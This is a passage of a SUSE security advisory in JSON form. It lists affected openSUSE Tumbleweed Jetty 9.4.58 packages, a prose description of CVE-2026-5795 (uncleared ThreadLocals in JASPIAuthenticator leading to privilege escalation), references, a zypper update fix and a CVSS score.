"openSUSE Tumbleweed:jetty-security-9.4.58-4.1.ppc64le",
"openSUSE Tumbleweed:jetty-security-9.4.58-4.1.s390x",
"openSUSE Tumbleweed:jetty-security-9.4.58-4.1.x86_64",
"openSUSE Tumbleweed:jetty-server-9.4.58-4.1.aarch64",
"openSUSE Tumbleweed:jetty-server-9.4.58-4.1.ppc64le",
"openSUSE Tumbleweed:jetty-server-9.4.58-4.1.s390x",
"openSUSE Tumbleweed:jetty-server-9.4.58-4.1.x86_64",
"openSUSE Tumbleweed:jetty-servlet-9.4.58-4.1.aarch64",
"openSUSE Tumbleweed:jetty-servlet-9.4.58-4.1.ppc64le",
"openSUSE Tumbleweed:jetty-servlet-9.4.58-4.1.s390x",
"openSUSE Tumbleweed:jetty-servlet-9.4.58-4.1.x86_64",
"openSUSE Tumbleweed:jetty-servlets-9.4.58-4.1.aarch64",
"openSUSE Tumbleweed:jetty-servlets-9.4.58-4.1.ppc64le",
"openSUSE Tumbleweed:jetty-servlets-9.4.58-4.1.s390x",
"openSUSE Tumbleweed:jetty-servlets-9.4.58-4.1.x86_64",
"openSUSE Tumbleweed:jetty-start-9.4.58-4.1.aarch64",
"openSUSE Tumbleweed:jetty-start-9.4.58-4.1.ppc64le",
"openSUSE Tumbleweed:jetty-start-9.4.58-4.1.s390x",
"openSUSE Tumbleweed:jetty-start-9.4.58-4.1.x86_64",
"openSUSE Tumbleweed:jetty-util-9.4.58-4.1.aarch64",
"openSUSE Tumbleweed:jetty-util-9.4.58-4.1.ppc64le",
"openSUSE Tumbleweed:jetty-util-9.4.58-4.1.s390x",
"openSUSE Tumbleweed:jetty-util-9.4.58-4.1.x86_64",
"openSUSE Tumbleweed:jetty-util-ajax-9.4.58-4.1.aarch64",
"openSUSE Tumbleweed:jetty-util-ajax-9.4.58-4.1.ppc64le",
"openSUSE Tumbleweed:jetty-util-ajax-9.4.58-4.1.s390x",
"openSUSE Tumbleweed:jetty-util-ajax-9.4.58-4.1.x86_64",
"openSUSE Tumbleweed:jetty-webapp-9.4.58-4.1.aarch64",
"openSUSE Tumbleweed:jetty-webapp-9.4.58-4.1.ppc64le",
"openSUSE Tumbleweed:jetty-webapp-9.4.58-4.1.s390x",
"openSUSE Tumbleweed:jetty-webapp-9.4.58-4.1.x86_64",
"openSUSE Tumbleweed:jetty-xml-9.4.58-4.1.aarch64",
"openSUSE Tumbleweed:jetty-xml-9.4.58-4.1.ppc64le",
"openSUSE Tumbleweed:jetty-xml-9.4.58-4.1.s390x",
"openSUSE Tumbleweed:jetty-xml-9.4.58-4.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-04-18T00:00:00Z",
"details": "important"
}
],
"title": "CVE-2026-2332"
},
{
"cve": "CVE-2026-5795",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-5795"
}
],
"notes": [
{
"category": "general",
"text": "In Eclipse Jetty, the class JASPIAuthenticator initiates the authentication checks, which set two ThreadLocal variable.\n\n\nUpon returning from the initial checks, there are conditions that cause an early return from the JASPIAuthenticator code without clearing those ThreadLocals.\n\n\nA subsequent request using the same thread inherits the ThreadLocal values, leading to a broken access control and privilege escalation.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Tumbleweed:jetty-annotations-9.4.58-4.1.aarch64",
"openSUSE Tumbleweed:jetty-annotations-9.4.58-4.1.ppc64le",
"openSUSE Tumbleweed:jetty-annotations-9.4.58-4.1.s390x",
"openSUSE Tumbleweed:jetty-annotations-9.4.58-4.1.x86_64",
"openSUSE Tumbleweed:jetty-ant-9.4.58-4.1.aarch64",
"openSUSE Tumbleweed:jetty-ant-9.4.58-4.1.ppc64le",
"openSUSE Tumbleweed:jetty-ant-9.4.58-4.1.s390x",
"openSUSE Tumbleweed:jetty-ant-9.4.58-4.1.x86_64",
"openSUSE Tumbleweed:jetty-cdi-9.4.58-4.1.aarch64",
"openSUSE Tumbleweed:jetty-cdi-9.4.58-4.1.ppc64le",
"openSUSE Tumbleweed:jetty-cdi-9.4.58-4.1.s390x",
"openSUSE Tumbleweed:jetty-cdi-9.4.58-4.1.x86_64",
"openSUSE Tumbleweed:jetty-client-9.4.58-4.1.aarch64",
"openSUSE Tumbleweed:jetty-client-9.4.58-4.1.ppc64le",
"openSUSE Tumbleweed:jetty-client-9.4.58-4.1.s390x",
"openSUSE Tumbleweed:jetty-client-9.4.58-4.1.x86_64",
"openSUSE Tumbleweed:jetty-continuation-9.4.58-4.1.aarch64",
"openSUSE Tumbleweed:jetty-continuation-9.4.58-4.1.ppc64le",
"openSUSE Tumbleweed:jetty-continuation-9.4.58-4.1.s390x",
"openSUSE Tumbleweed:jetty-continuation-9.4.58-4.1.x86_64",
"openSUSE Tumbleweed:jetty-deploy-9.4.58-4.1.aarch64",
"openSUSE Tumbleweed:jetty-deploy-9.4.58-4.1.ppc64le",
"openSUSE Tumbleweed:jetty-deploy-9.4.58-4.1.s390x",
"openSUSE Tumbleweed:jetty-deploy-9.4.58-4.1.x86_64",
"openSUSE Tumbleweed:jetty-fcgi-9.4.58-4.1.aarch64",
"openSUSE Tumbleweed:jetty-fcgi-9.4.58-4.1.ppc64le",
"openSUSE Tumbleweed:jetty-fcgi-9.4.58-4.1.s390x",
"openSUSE Tumbleweed:jetty-fcgi-9.4.58-4.1.x86_64",
"openSUSE Tumbleweed:jetty-http-9.4.58-4.1.aarch64",
"openSUSE Tumbleweed:jetty-http-9.4.58-4.1.ppc64le",
"openSUSE Tumbleweed:jetty-http-9.4.58-4.1.s390x",
"openSUSE Tumbleweed:jetty-http-9.4.58-4.1.x86_64",
"openSUSE Tumbleweed:jetty-http-spi-9.4.58-4.1.aarch64",
"openSUSE Tumbleweed:jetty-http-spi-9.4.58-4.1.ppc64le",
"openSUSE Tumbleweed:jetty-http-spi-9.4.58-4.1.s390x",
"openSUSE Tumbleweed:jetty-http-spi-9.4.58-4.1.x86_64",
"openSUSE Tumbleweed:jetty-io-9.4.58-4.1.aarch64",
"openSUSE Tumbleweed:jetty-io-9.4.58-4.1.ppc64le",
"openSUSE Tumbleweed:jetty-io-9.4.58-4.1.s390x",
"openSUSE Tumbleweed:jetty-io-9.4.58-4.1.x86_64",
"openSUSE Tumbleweed:jetty-jaas-9.4.58-4.1.aarch64",
"openSUSE Tumbleweed:jetty-jaas-9.4.58-4.1.ppc64le",
"openSUSE Tumbleweed:jetty-jaas-9.4.58-4.1.s390x",
"openSUSE Tumbleweed:jetty-jaas-9.4.58-4.1.x86_64",
"openSUSE Tumbleweed:jetty-jaspi-9.4.58-4.1.aarch64",
"openSUSE Tumbleweed:jetty-jaspi-9.4.58-4.1.ppc64le",
"openSUSE Tumbleweed:jetty-jaspi-9.4.58-4.1.s390x",
"openSUSE Tumbleweed:jetty-jaspi-9.4.58-4.1.x86_64",
"openSUSE Tumbleweed:jetty-jmx-9.4.58-4.1.aarch64",
"openSUSE Tumbleweed:jetty-jmx-9.4.58-4.1.ppc64le",
"openSUSE Tumbleweed:jetty-jmx-9.4.58-4.1.s390x",
"openSUSE Tumbleweed:jetty-jmx-9.4.58-4.1.x86_64",
"openSUSE Tumbleweed:jetty-jndi-9.4.58-4.1.aarch64",
"openSUSE Tumbleweed:jetty-jndi-9.4.58-4.1.ppc64le",
"openSUSE Tumbleweed:jetty-jndi-9.4.58-4.1.s390x",
"openSUSE Tumbleweed:jetty-jndi-9.4.58-4.1.x86_64",
"openSUSE Tumbleweed:jetty-jsp-9.4.58-4.1.aarch64",
"openSUSE Tumbleweed:jetty-jsp-9.4.58-4.1.ppc64le",
"openSUSE Tumbleweed:jetty-jsp-9.4.58-4.1.s390x",
"openSUSE Tumbleweed:jetty-jsp-9.4.58-4.1.x86_64",
"openSUSE Tumbleweed:jetty-minimal-javadoc-9.4.58-4.1.aarch64",
"openSUSE Tumbleweed:jetty-minimal-javadoc-9.4.58-4.1.ppc64le",
"openSUSE Tumbleweed:jetty-minimal-javadoc-9.4.58-4.1.s390x",
"openSUSE Tumbleweed:jetty-minimal-javadoc-9.4.58-4.1.x86_64",
"openSUSE Tumbleweed:jetty-openid-9.4.58-4.1.aarch64",
"openSUSE Tumbleweed:jetty-openid-9.4.58-4.1.ppc64le",
"openSUSE Tumbleweed:jetty-openid-9.4.58-4.1.s390x",
"openSUSE Tumbleweed:jetty-openid-9.4.58-4.1.x86_64",
"openSUSE Tumbleweed:jetty-plus-9.4.58-4.1.aarch64",
"openSUSE Tumbleweed:jetty-plus-9.4.58-4.1.ppc64le",
"openSUSE Tumbleweed:jetty-plus-9.4.58-4.1.s390x",
"openSUSE Tumbleweed:jetty-plus-9.4.58-4.1.x86_64",
"openSUSE Tumbleweed:jetty-project-9.4.58-4.1.aarch64",
"openSUSE Tumbleweed:jetty-project-9.4.58-4.1.ppc64le",
"openSUSE Tumbleweed:jetty-project-9.4.58-4.1.s390x",
"openSUSE Tumbleweed:jetty-project-9.4.58-4.1.x86_64",
"openSUSE Tumbleweed:jetty-proxy-9.4.58-4.1.aarch64",
"openSUSE Tumbleweed:jetty-proxy-9.4.58-4.1.ppc64le",
"openSUSE Tumbleweed:jetty-proxy-9.4.58-4.1.s390x",
"openSUSE Tumbleweed:jetty-proxy-9.4.58-4.1.x86_64",
"openSUSE Tumbleweed:jetty-quickstart-9.4.58-4.1.aarch64",
"openSUSE Tumbleweed:jetty-quickstart-9.4.58-4.1.ppc64le",
"openSUSE Tumbleweed:jetty-quickstart-9.4.58-4.1.s390x",
"openSUSE Tumbleweed:jetty-quickstart-9.4.58-4.1.x86_64",
"openSUSE Tumbleweed:jetty-rewrite-9.4.58-4.1.aarch64",
"openSUSE Tumbleweed:jetty-rewrite-9.4.58-4.1.ppc64le",
"openSUSE Tumbleweed:jetty-rewrite-9.4.58-4.1.s390x",
"openSUSE Tumbleweed:jetty-rewrite-9.4.58-4.1.x86_64",
"openSUSE Tumbleweed:jetty-security-9.4.58-4.1.aarch64",
"openSUSE Tumbleweed:jetty-security-9.4.58-4.1.ppc64le",
"openSUSE Tumbleweed:jetty-security-9.4.58-4.1.s390x",
"openSUSE Tumbleweed:jetty-security-9.4.58-4.1.x86_64",
"openSUSE Tumbleweed:jetty-server-9.4.58-4.1.aarch64",
"openSUSE Tumbleweed:jetty-server-9.4.58-4.1.ppc64le",
"openSUSE Tumbleweed:jetty-server-9.4.58-4.1.s390x",
"openSUSE Tumbleweed:jetty-server-9.4.58-4.1.x86_64",
"openSUSE Tumbleweed:jetty-servlet-9.4.58-4.1.aarch64",
"openSUSE Tumbleweed:jetty-servlet-9.4.58-4.1.ppc64le",
"openSUSE Tumbleweed:jetty-servlet-9.4.58-4.1.s390x",
"openSUSE Tumbleweed:jetty-servlet-9.4.58-4.1.x86_64",
"openSUSE Tumbleweed:jetty-servlets-9.4.58-4.1.aarch64",
"openSUSE Tumbleweed:jetty-servlets-9.4.58-4.1.ppc64le",
"openSUSE Tumbleweed:jetty-servlets-9.4.58-4.1.s390x",
"openSUSE Tumbleweed:jetty-servlets-9.4.58-4.1.x86_64",
"openSUSE Tumbleweed:jetty-start-9.4.58-4.1.aarch64",
"openSUSE Tumbleweed:jetty-start-9.4.58-4.1.ppc64le",
"openSUSE Tumbleweed:jetty-start-9.4.58-4.1.s390x",
"openSUSE Tumbleweed:jetty-start-9.4.58-4.1.x86_64",
"openSUSE Tumbleweed:jetty-util-9.4.58-4.1.aarch64",
"openSUSE Tumbleweed:jetty-util-9.4.58-4.1.ppc64le",
"openSUSE Tumbleweed:jetty-util-9.4.58-4.1.s390x",
"openSUSE Tumbleweed:jetty-util-9.4.58-4.1.x86_64",
"openSUSE Tumbleweed:jetty-util-ajax-9.4.58-4.1.aarch64",
"openSUSE Tumbleweed:jetty-util-ajax-9.4.58-4.1.ppc64le",
"openSUSE Tumbleweed:jetty-util-ajax-9.4.58-4.1.s390x",
"openSUSE Tumbleweed:jetty-util-ajax-9.4.58-4.1.x86_64",
"openSUSE Tumbleweed:jetty-webapp-9.4.58-4.1.aarch64",
"openSUSE Tumbleweed:jetty-webapp-9.4.58-4.1.ppc64le",
"openSUSE Tumbleweed:jetty-webapp-9.4.58-4.1.s390x",
"openSUSE Tumbleweed:jetty-webapp-9.4.58-4.1.x86_64",
"openSUSE Tumbleweed:jetty-xml-9.4.58-4.1.aarch64",
"openSUSE Tumbleweed:jetty-xml-9.4.58-4.1.ppc64le",
"openSUSE Tumbleweed:jetty-xml-9.4.58-4.1.s390x",
"openSUSE Tumbleweed:jetty-xml-9.4.58-4.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-5795",
"url": "https://www.suse.com/security/cve/CVE-2026-5795"
},
{
"category": "external",
"summary": "SUSE Bug 1261997 for CVE-2026-5795",
"url": "https://bugzilla.suse.com/1261997"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Tumbleweed:jetty-annotations-9.4.58-4.1.aarch64",
"openSUSE Tumbleweed:jetty-annotations-9.4.58-4.1.ppc64le",
"openSUSE Tumbleweed:jetty-annotations-9.4.58-4.1.s390x",
"openSUSE Tumbleweed:jetty-annotations-9.4.58-4.1.x86_64",
"openSUSE Tumbleweed:jetty-ant-9.4.58-4.1.aarch64",
"openSUSE Tumbleweed:jetty-ant-9.4.58-4.1.ppc64le",
"openSUSE Tumbleweed:jetty-ant-9.4.58-4.1.s390x",
"openSUSE Tumbleweed:jetty-ant-9.4.58-4.1.x86_64",
"openSUSE Tumbleweed:jetty-cdi-9.4.58-4.1.aarch64",
"openSUSE Tumbleweed:jetty-cdi-9.4.58-4.1.ppc64le",
"openSUSE Tumbleweed:jetty-cdi-9.4.58-4.1.s390x",
"openSUSE Tumbleweed:jetty-cdi-9.4.58-4.1.x86_64",
"openSUSE Tumbleweed:jetty-client-9.4.58-4.1.aarch64",
"openSUSE Tumbleweed:jetty-client-9.4.58-4.1.ppc64le",
"openSUSE Tumbleweed:jetty-client-9.4.58-4.1.s390x",
"openSUSE Tumbleweed:jetty-client-9.4.58-4.1.x86_64",
"openSUSE Tumbleweed:jetty-continuation-9.4.58-4.1.aarch64",
"openSUSE Tumbleweed:jetty-continuation-9.4.58-4.1.ppc64le",
"openSUSE Tumbleweed:jetty-continuation-9.4.58-4.1.s390x",
"openSUSE Tumbleweed:jetty-continuation-9.4.58-4.1.x86_64",
"openSUSE Tumbleweed:jetty-deploy-9.4.58-4.1.aarch64",
"openSUSE Tumbleweed:jetty-deploy-9.4.58-4.1.ppc64le",
"openSUSE Tumbleweed:jetty-deploy-9.4.58-4.1.s390x",
"openSUSE Tumbleweed:jetty-deploy-9.4.58-4.1.x86_64",
"openSUSE Tumbleweed:jetty-fcgi-9.4.58-4.1.aarch64",
"openSUSE Tumbleweed:jetty-fcgi-9.4.58-4.1.ppc64le",
"openSUSE Tumbleweed:jetty-fcgi-9.4.58-4.1.s390x",
"openSUSE Tumbleweed:jetty-fcgi-9.4.58-4.1.x86_64",
"openSUSE Tumbleweed:jetty-http-9.4.58-4.1.aarch64",
"openSUSE Tumbleweed:jetty-http-9.4.58-4.1.ppc64le",
"openSUSE Tumbleweed:jetty-http-9.4.58-4.1.s390x",
"openSUSE Tumbleweed:jetty-http-9.4.58-4.1.x86_64",
"openSUSE Tumbleweed:jetty-http-spi-9.4.58-4.1.aarch64",
"openSUSE Tumbleweed:jetty-http-spi-9.4.58-4.1.ppc64le",
"openSUSE Tumbleweed:jetty-http-spi-9.4.58-4.1.s390x",
"openSUSE Tumbleweed:jetty-http-spi-9.4.58-4.1.x86_64",
"openSUSE Tumbleweed:jetty-io-9.4.58-4.1.aarch64",
"openSUSE Tumbleweed:jetty-io-9.4.58-4.1.ppc64le",
"openSUSE Tumbleweed:jetty-io-9.4.58-4.1.s390x",
"openSUSE Tumbleweed:jetty-io-9.4.58-4.1.x86_64",
"openSUSE Tumbleweed:jetty-jaas-9.4.58-4.1.aarch64",
"openSUSE Tumbleweed:jetty-jaas-9.4.58-4.1.ppc64le",
"openSUSE Tumbleweed:jetty-jaas-9.4.58-4.1.s390x",
"openSUSE Tumbleweed:jetty-jaas-9.4.58-4.1.x86_64",
"openSUSE Tumbleweed:jetty-jaspi-9.4.58-4.1.aarch64",
"openSUSE Tumbleweed:jetty-jaspi-9.4.58-4.1.ppc64le",
"openSUSE Tumbleweed:jetty-jaspi-9.4.58-4.1.s390x",
"openSUSE Tumbleweed:jetty-jaspi-9.4.58-4.1.x86_64",
"openSUSE Tumbleweed:jetty-jmx-9.4.58-4.1.aarch64",
"openSUSE Tumbleweed:jetty-jmx-9.4.58-4.1.ppc64le",
"openSUSE Tumbleweed:jetty-jmx-9.4.58-4.1.s390x",
"openSUSE Tumbleweed:jetty-jmx-9.4.58-4.1.x86_64",
"openSUSE Tumbleweed:jetty-jndi-9.4.58-4.1.aarch64",
"openSUSE Tumbleweed:jetty-jndi-9.4.58-4.1.ppc64le",
"openSUSE Tumbleweed:jetty-jndi-9.4.58-4.1.s390x",
"openSUSE Tumbleweed:jetty-jndi-9.4.58-4.1.x86_64",
"openSUSE Tumbleweed:jetty-jsp-9.4.58-4.1.aarch64",
"openSUSE Tumbleweed:jetty-jsp-9.4.58-4.1.ppc64le",
"openSUSE Tumbleweed:jetty-jsp-9.4.58-4.1.s390x",
"openSUSE Tumbleweed:jetty-jsp-9.4.58-4.1.x86_64",
"openSUSE Tumbleweed:jetty-minimal-javadoc-9.4.58-4.1.aarch64",
"openSUSE Tumbleweed:jetty-minimal-javadoc-9.4.58-4.1.ppc64le",
"openSUSE Tumbleweed:jetty-minimal-javadoc-9.4.58-4.1.s390x",
"openSUSE Tumbleweed:jetty-minimal-javadoc-9.4.58-4.1.x86_64",
"openSUSE Tumbleweed:jetty-openid-9.4.58-4.1.aarch64",
"openSUSE Tumbleweed:jetty-openid-9.4.58-4.1.ppc64le",
"openSUSE Tumbleweed:jetty-openid-9.4.58-4.1.s390x",
"openSUSE Tumbleweed:jetty-openid-9.4.58-4.1.x86_64",
"openSUSE Tumbleweed:jetty-plus-9.4.58-4.1.aarch64",
"openSUSE Tumbleweed:jetty-plus-9.4.58-4.1.ppc64le",
"openSUSE Tumbleweed:jetty-plus-9.4.58-4.1.s390x",
"openSUSE Tumbleweed:jetty-plus-9.4.58-4.1.x86_64",
"openSUSE Tumbleweed:jetty-project-9.4.58-4.1.aarch64",
"openSUSE Tumbleweed:jetty-project-9.4.58-4.1.ppc64le",
"openSUSE Tumbleweed:jetty-project-9.4.58-4.1.s390x",
"openSUSE Tumbleweed:jetty-project-9.4.58-4.1.x86_64",
"openSUSE Tumbleweed:jetty-proxy-9.4.58-4.1.aarch64",
"openSUSE Tumbleweed:jetty-proxy-9.4.58-4.1.ppc64le",
"openSUSE Tumbleweed:jetty-proxy-9.4.58-4.1.s390x",
"openSUSE Tumbleweed:jetty-proxy-9.4.58-4.1.x86_64",
"openSUSE Tumbleweed:jetty-quickstart-9.4.58-4.1.aarch64",
"openSUSE Tumbleweed:jetty-quickstart-9.4.58-4.1.ppc64le",
"openSUSE Tumbleweed:jetty-quickstart-9.4.58-4.1.s390x",
"openSUSE Tumbleweed:jetty-quickstart-9.4.58-4.1.x86_64",
"openSUSE Tumbleweed:jetty-rewrite-9.4.58-4.1.aarch64",
"openSUSE Tumbleweed:jetty-rewrite-9.4.58-4.1.ppc64le",
"openSUSE Tumbleweed:jetty-rewrite-9.4.58-4.1.s390x",
"openSUSE Tumbleweed:jetty-rewrite-9.4.58-4.1.x86_64",
"openSUSE Tumbleweed:jetty-security-9.4.58-4.1.aarch64",
"openSUSE Tumbleweed:jetty-security-9.4.58-4.1.ppc64le",
"openSUSE Tumbleweed:jetty-security-9.4.58-4.1.s390x",
"openSUSE Tumbleweed:jetty-security-9.4.58-4.1.x86_64",
"openSUSE Tumbleweed:jetty-server-9.4.58-4.1.aarch64",
"openSUSE Tumbleweed:jetty-server-9.4.58-4.1.ppc64le",
"openSUSE Tumbleweed:jetty-server-9.4.58-4.1.s390x",
"openSUSE Tumbleweed:jetty-server-9.4.58-4.1.x86_64",
"openSUSE Tumbleweed:jetty-servlet-9.4.58-4.1.aarch64",
"openSUSE Tumbleweed:jetty-servlet-9.4.58-4.1.ppc64le",
"openSUSE Tumbleweed:jetty-servlet-9.4.58-4.1.s390x",
"openSUSE Tumbleweed:jetty-servlet-9.4.58-4.1.x86_64",
"openSUSE Tumbleweed:jetty-servlets-9.4.58-4.1.aarch64",
"openSUSE Tumbleweed:jetty-servlets-9.4.58-4.1.ppc64le",
"openSUSE Tumbleweed:jetty-servlets-9.4.58-4.1.s390x",
"openSUSE Tumbleweed:jetty-servlets-9.4.58-4.1.x86_64",
"openSUSE Tumbleweed:jetty-start-9.4.58-4.1.aarch64",
"openSUSE Tumbleweed:jetty-start-9.4.58-4.1.ppc64le",
"openSUSE Tumbleweed:jetty-start-9.4.58-4.1.s390x",
"openSUSE Tumbleweed:jetty-start-9.4.58-4.1.x86_64",
"openSUSE Tumbleweed:jetty-util-9.4.58-4.1.aarch64",
"openSUSE Tumbleweed:jetty-util-9.4.58-4.1.ppc64le",
"openSUSE Tumbleweed:jetty-util-9.4.58-4.1.s390x",
"openSUSE Tumbleweed:jetty-util-9.4.58-4.1.x86_64",
"openSUSE Tumbleweed:jetty-util-ajax-9.4.58-4.1.aarch64",
"openSUSE Tumbleweed:jetty-util-ajax-9.4.58-4.1.ppc64le",
"openSUSE Tumbleweed:jetty-util-ajax-9.4.58-4.1.s390x",
"openSUSE Tumbleweed:jetty-util-ajax-9.4.58-4.1.x86_64",
"openSUSE Tumbleweed:jetty-webapp-9.4.58-4.1.aarch64",
"openSUSE Tumbleweed:jetty-webapp-9.4.58-4.1.ppc64le",
"openSUSE Tumbleweed:jetty-webapp-9.4.58-4.1.s390x",
"openSUSE Tumbleweed:jetty-webapp-9.4.58-4.1.x86_64",
"openSUSE Tumbleweed:jetty-xml-9.4.58-4.1.aarch64",
"openSUSE Tumbleweed:jetty-xml-9.4.58-4.1.ppc64le",
"openSUSE Tumbleweed:jetty-xml-9.4.58-4.1.s390x",
"openSUSE Tumbleweed:jetty-xml-9.4.58-4.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7.4,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N",
"version": "3.1"
},
"products": [
"openSUSE Tumbleweed:jetty-annotations-9.4.58-4.1.aarch64",
"openSUSE Tumbleweed:jetty-annotations-9.4.58-4.1.ppc64le",
"openSUSE Tumbleweed:jetty-annotations-9.4.58-4.1.s390x",
"openSUSE Tumbleweed:jetty-annotations-9.4.58-4.1.x86_64",
"openSUSE Tumbleweed:jetty-ant-9.4.58-4.1.aarch64",
"openSUSE Tumbleweed:jetty-ant-9.4.58-4.1.ppc64le",
"openSUSE Tumbleweed:jetty-ant-9.4.58-4.1.s390x",
"openSUSE Tumbleweed:jetty-ant-9.4.58-4.1.x86_64",
"openSUSE Tumbleweed:jetty-cdi-9.4.58-4.1.aarch64",
"openSUSE Tumbleweed:jetty-cdi-9.4.58-4.1.ppc64le",
"openSUSE Tumbleweed:jetty-cdi-9.4.58-4.1.s390x",
"openSUSE Tumbleweed:jetty-cdi-9.4.58-4.1.x86_64",
"openSUSE Tumbleweed:jetty-client-9.4.58-4.1.aarch64",
"openSUSE Tumbleweed:jetty-client-9.4.58-4.1.ppc64le",
"openSUSE Tumbleweed:jetty-client-9.4.58-4.1.s390x",
"openSUSE Tumbleweed:jetty-client-9.4.58-4.1.x86_64",
"openSUSE Tumbleweed:jetty-continuation-9.4.58-4.1.aarch64",
"openSUSE Tumbleweed:jetty-continuation-9.4.58-4.1.ppc64le",
"openSUSE Tumbleweed:jetty-continuation-9.4.58-4.1.s390x",
"openSUSE Tumbleweed:jetty-continuation-9.4.58-4.1.x86_64",
"openSUSE Tumbleweed:jetty-deploy-9.4.58-4.1.aarch64",
"openSUSE Tumbleweed:jetty-deploy-9.4.58-4.1.ppc64le",
"openSUSE Tumbleweed:jetty-deploy-9.4.58-4.1.s390x",
"openSUSE Tumbleweed:jetty-deploy-9.4.58-4.1.x86_64",
"openSUSE Tumbleweed:jetty-fcgi-9.4.58-4.1.aarch64",
"openSUSE Tumbleweed:jetty-fcgi-9.4.58-4.1.ppc64le",
"openSUSE Tumbleweed:jetty-fcgi-9.4.58-4.1.s390x",
"openSUSE Tumbleweed:jetty-fcgi-9.4.58-4.1.x86_64",
"openSUSE Tumbleweed:jetty-http-9.4.58-4.1.aarch64",
"openSUSE Tumbleweed:jetty-http-9.4.58-4.1.ppc64le",
"openSUSE Tumbleweed:jetty-http-9.4.58-4.1.s390x",
"openSUSE Tumbleweed:jetty-http-9.4.58-4.1.x86_64",
"openSUSE Tumbleweed:jetty-http-spi-9.4.58-4.1.aarch64",
"openSUSE Tumbleweed:jetty-http-spi-9.4.58-4.1.ppc64le",
"openSUSE Tumbleweed:jetty-http-spi-9.4.58-4.1.s390x",
"openSUSE Tumbleweed:jetty-http-spi-9.4.58-4.1.x86_64",
"openSUSE Tumbleweed:jetty-io-9.4.58-4.1.aarch64",
"openSUSE Tumbleweed:jetty-io-9.4.58-4.1.ppc64le",
"openSUSE Tumbleweed:jetty-io-9.4.58-4.1.s390x",
"openSUSE Tumbleweed:jetty-io-9.4.58-4.1.x86_64",
"openSUSE Tumbleweed:jetty-jaas-9.4.58-4.1.aarch64",
"openSUSE Tumbleweed:jetty-jaas-9.4.58-4.1.ppc64le",
"openSUSE Tumbleweed:jetty-jaas-9.4.58-4.1.s390x",
"openSUSE Tumbleweed:jetty-jaas-9.4.58-4.1.x86_64",
"openSUSE Tumbleweed:jetty-jaspi-9.4.58-4.1.aarch64",
"openSUSE Tumbleweed:jetty-jaspi-9.4.58-4.1.ppc64le",
"openSUSE Tumbleweed:jetty-jaspi-9.4.58-4.1.s390x",
"openSUSE Tumbleweed:jetty-jaspi-9.4.58-4.1.x86_64",
"openSUSE Tumbleweed:jetty-jmx-9.4.58-4.1.aarch64",
"openSUSE Tumbleweed:jetty-jmx-9.4.58-4.1.ppc64le",
"openSUSE Tumbleweed:jetty-jmx-9.4.58-4.1.s390x",
"openSUSE Tumbleweed:jetty-jmx-9.4.58-4.1.x86_64",
"openSUSE Tumbleweed:jetty-jndi-9.4.58-4.1.aarch64",
"openSUSE Tumbleweed:jetty-jndi-9.4.58-4.1.ppc64le",
"openSUSE Tumbleweed:jetty-jndi-9.4.58-4.1.s390x",
"openSUSE Tumbleweed:jetty-jndi-9.4.58-4.1.x86_64",
"openSUSE Tumbleweed:jetty-jsp-9.4.58-4.1.aarch64",
"openSUSE Tumbleweed:jetty-jsp-9.4.58-4.1.ppc64le",
"openSUSE Tumbleweed:jetty-jsp-9.4.58-4.1.s390x",
"openSUSE Tumbleweed:jetty-jsp-9.4.58-4.1.x86_64",
"openSUSE Tumbleweed:jetty-minimal-javadoc-9.4.58-4.1.aarch64",
"openSUSE Tumbleweed:jetty-minimal-javadoc-9.4.58-4.1.ppc64le",
"openSUSE Tumbleweed:jetty-minimal-javadoc-9.4.58-4.1.s390x",
"openSUSE Tumbleweed:jetty-minimal-javadoc-9.4.58-4.1.x86_64",
"openSUSE Tumbleweed:jetty-openid-9.4.58-4.1.aarch64",
"openSUSE Tumbleweed:jetty-openid-9.4.58-4.1.ppc64le",
"openSUSE Tumbleweed:jetty-openid-9.4.58-4.1.s390x",
"openSUSE Tumbleweed:jetty-openid-9.4.58-4.1.x86_64",
"openSUSE Tumbleweed:jetty-plus-9.4.58-4.1.aarch64",
"openSUSE Tumbleweed:jetty-plus-9.4.58-4.1.ppc64le",
"openSUSE Tumbleweed:jetty-plus-9.4.58-4.1.s390x",
"openSUSE Tumbleweed:jetty-plus-9.4.58-4.1.x86_64",
"openSUSE Tumbleweed:jetty-project-9.4.58-4.1.aarch64",
"openSUSE Tumbleweed:jetty-project-9.4.58-4.1.ppc64le",
"openSUSE Tumbleweed:jetty-project-9.4.58-4.1.s390x",
"openSUSE Tumbleweed:jetty-project-9.4.58-4.1.x86_64",
"openSUSE Tumbleweed:jetty-proxy-9.4.58-4.1.aarch64",
"openSUSE Tumbleweed:jetty-proxy-9.4.58-4.1.ppc64le",
"openSUSE Tumbleweed:jetty-proxy-9.4.58-4.1.s390x",
"openSUSE Tumbleweed:jetty-proxy-9.4.58-4.1.x86_64",
"openSUSE Tumbleweed:jetty-quickstart-9.4.58-4.1.aarch64",
"openSUSE Tumbleweed:jetty-quickstart-9.4.58-4.1.ppc64le",
"openSUSE Tumbleweed:jetty-quickstart-9.4.58-4.1.s390x",
"openSUSE Tumbleweed:jetty-quickstart-9.4.58-4.1.x86_64",
"openSUSE Tumbleweed:jetty-rewrite-9.4.58-4.1.aarch64",
"openSUSE Tumbleweed:jetty-rewrite-9.4.58-4.1.ppc64le",
"openSUSE Tumbleweed:jetty-rewrite-9.4.58-4.1.s390x",
"openSUSE Tumbleweed:jetty-rewrite-9.4.58-4.1.x86_64",
"openSUSE Tumbleweed:jetty-security-9.4.58-4.1.aarch64",
"openSUSE Tumbleweed:jetty-security-9.4.58-4.1.ppc64le",
"openSUSE Tumbleweed:jetty-security-9.4.58-4.1.s390x",
"openSUSE Tumbleweed:jetty-security-9.4.58-4.1.x86_64",
"openSUSE Tumbleweed:jetty-server-9.4.58-4.1.aarch64",
"openSUSE Tumbleweed:jetty-server-9.4.58-4.1.ppc64le",
"openSUSE Tumbleweed:jetty-server-9.4.58-4.1.s390x",
"openSUSE Tumbleweed:jetty-server-9.4.58-4.1.x86_64",
"openSUSE Tumbleweed:jetty-servlet-9.4.58-4.1.aarch64",
